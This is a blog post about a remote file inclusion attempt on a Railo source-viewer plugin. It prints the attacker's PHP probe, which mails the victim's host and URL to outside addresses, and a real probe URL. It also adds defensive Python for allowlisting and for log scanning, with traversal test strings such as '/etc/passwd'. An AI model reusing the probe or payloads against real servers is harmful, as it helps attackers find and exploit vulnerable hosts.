Hacking attempt

Today I got an error saying that "file http://www.odigoslimnisplastira.gr/giros/large/111.txt? could not be viewed". The error came from my viewsource plugin, which uses a URL variable 'file' to decide which file to show the source of.
Of course I added a check to that plugin so only certain files can be viewed, but if I had not, Railo would have downloaded and read the remote file and shown this on-screen:

<?php
//=================================
//
// Scan inb0x hotmail v1.0
//
// coded by _[[NetWork]]_
// don't rip this, you bastards :]
//
//
// Elite Group Forever2008
//=================================
//
// Let the script run without a time limit.
ini_set("max_execution_time",-1);
set_time_limit(0);
// Name of the account the web server runs as, used as the sender address.
$user = @get_current_user();
$email = "$user";
$assunto = "Vulll.";
$email1 = "ckaixa.imbox@gmail.com,dkfft.lk@hotmail.com";
$headers = "From: <$email>\r\n";

// Mail the host and request URI that executed this file to the two addresses above,
// i.e. report back which URL on the victim's server includes remote files.
if(mail($email1, $assunto, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
    echo "Opa, enviado!";
    exit();
}
else{
    echo "Não enviei..";
    exit();
}
?>

Now, displaying this code on-screen is not a problem in itself, but if I instead had a script that, for some obscure reason, executed the fetched code, then these "elite group" nerds would know which file on my server allows remote uploads and code execution.
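The check described above, an allowlist on the 'file' parameter, is the mitigation that matters here. The plugin itself runs on Railo (CFML); what follows is an added Python illustration that is not the plugin's code or the post author's: it puts the weak pattern (use the parameter as-is) beside a hardened resolver that rejects anything with a URL scheme or host, requires an exact allowlist match, and additionally canonicalises the path and confirms it lies under the permitted directory. The directory and the allowlist entries are assumptions made up for the example.

```python
from pathlib import Path
from typing import Optional
from urllib.parse import urlsplit

# Assumptions for this illustration (not taken from the post): the directory the
# plugin may read from, and an explicit allowlist of files it may display.
SOURCE_ROOT = Path("/var/www/site/src").resolve()
ALLOWED_FILES = frozenset({"index.cfm", "Application.cfc", "views/home.cfm"})


def looks_remote(value: str) -> bool:
    """True when the value carries a URL scheme or host (http://..., //host/...)."""
    parts = urlsplit(value)
    return bool(parts.scheme) or bool(parts.netloc) or value.startswith("//")


def resolve_unchecked(file_param: str) -> str:
    """The weak pattern: whatever arrives in ?file= is handed straight to the
    file reader, so a remote URL gets fetched and a traversal string gets read."""
    return file_param


def resolve_allowlisted(file_param: str) -> Optional[Path]:
    """Return a path under SOURCE_ROOT only if the value is on the allowlist and
    canonicalises inside SOURCE_ROOT; return None for anything else."""
    if looks_remote(file_param):
        return None
    # Exact match against the allowlist; no prefix, glob or substring matching.
    if file_param not in ALLOWED_FILES:
        return None
    candidate = (SOURCE_ROOT / file_param).resolve()
    # Defence in depth: even an allowlisted name must canonicalise under the root,
    # which catches a symlink or a mis-edited allowlist entry such as "../x".
    if SOURCE_ROOT not in candidate.parents:
        return None
    return candidate


if __name__ == "__main__":
    # The probe from the post, a traversal attempt and a legitimate request.
    for value in ("http://www.odigoslimnisplastira.gr/giros/large/111.txt?",
                  "../../../../etc/passwd", "index.cfm"):
        print(f"{value!r:65} -> {resolve_allowlisted(value)}")
```

The allowlist does the real work; the canonicalisation step is there so that a later edit to the allowlist (or a symlink dropped into the source directory) cannot silently widen what the plugin will read.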

I guess I should just add the mod_httpbl Apache module from Project Honeypot. Will do so when their site is back up!
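Blocking by reputation list is one side; the other is noticing probes like this one in your own access log. Below is an added Python example, not from the post or from mod_httpbl, that sweeps Apache-style log lines for query parameters carrying a remote URL or a directory-traversal sequence and counts the hits per source address, which is the input you would want before deciding to block an IP. The log lines are constructed for the example: the probe URL is the one from the post, while the addresses (RFC 5737 documentation ranges), timestamps and the /viewsource.cfm path are assumptions.

```python
import re
from collections import Counter
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Apache common/combined log line: ip ident user [time] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample log (assumed IPs, times and script path; probe URL from the post).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/May/2011:19:01:12 +0200] "GET /viewsource.cfm?file=http://www.odigoslimnisplastira.gr/giros/large/111.txt? HTTP/1.1" 500 812',
    '198.51.100.3 - - [24/May/2011:19:02:40 +0200] "GET /viewsource.cfm?file=index.cfm HTTP/1.1" 200 4031',
    '203.0.113.7 - - [24/May/2011:19:03:05 +0200] "GET /viewsource.cfm?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 500 812',
    '198.51.100.3 - - [24/May/2011:19:04:00 +0200] "GET /index.cfm HTTP/1.1" 200 15022',
]


def classify_value(value: str) -> str:
    """Label one decoded query-parameter value: 'remote-url', 'traversal' or ''."""
    parts = urlsplit(value)
    if parts.scheme or parts.netloc or value.startswith("//"):
        return "remote-url"
    if ".." in value.replace("\\", "/").split("/"):
        return "traversal"
    return ""


def find_inclusion_probes(lines: List[str]) -> List[Dict[str, str]]:
    """Flag requests whose query parameters carry a remote URL or a traversal
    sequence. parse_qsl percent-decodes values, so ..%2F.. is seen as ../.."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than abort a whole log sweep
        query = urlsplit(m.group("target")).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            reason = classify_value(value)
            if reason:
                hits.append({"ip": m.group("ip"), "time": m.group("time"),
                             "param": param, "value": value,
                             "status": m.group("status"), "reason": reason})
    return hits


def probes_per_ip(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count flagged requests per source address, the input for a block decision."""
    return dict(Counter(h["ip"] for h in hits))


if __name__ == "__main__":
    found = find_inclusion_probes(SAMPLE_LOG)
    for h in found:
        print(f'{h["ip"]} {h["reason"]:10} {h["param"]}={h["value"]}')
    print(probes_per_ip(found))
```

Running it over a real log means feeding `find_inclusion_probes` the file's lines; the per-parameter check is deliberately generic so it catches the same probe aimed at any other script that takes a file-name parameter, not only the viewsource plugin.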

#1 by Dorie - May 24, 2011 at 7:44 PM

Wow, that's a really clever way of thinking about it!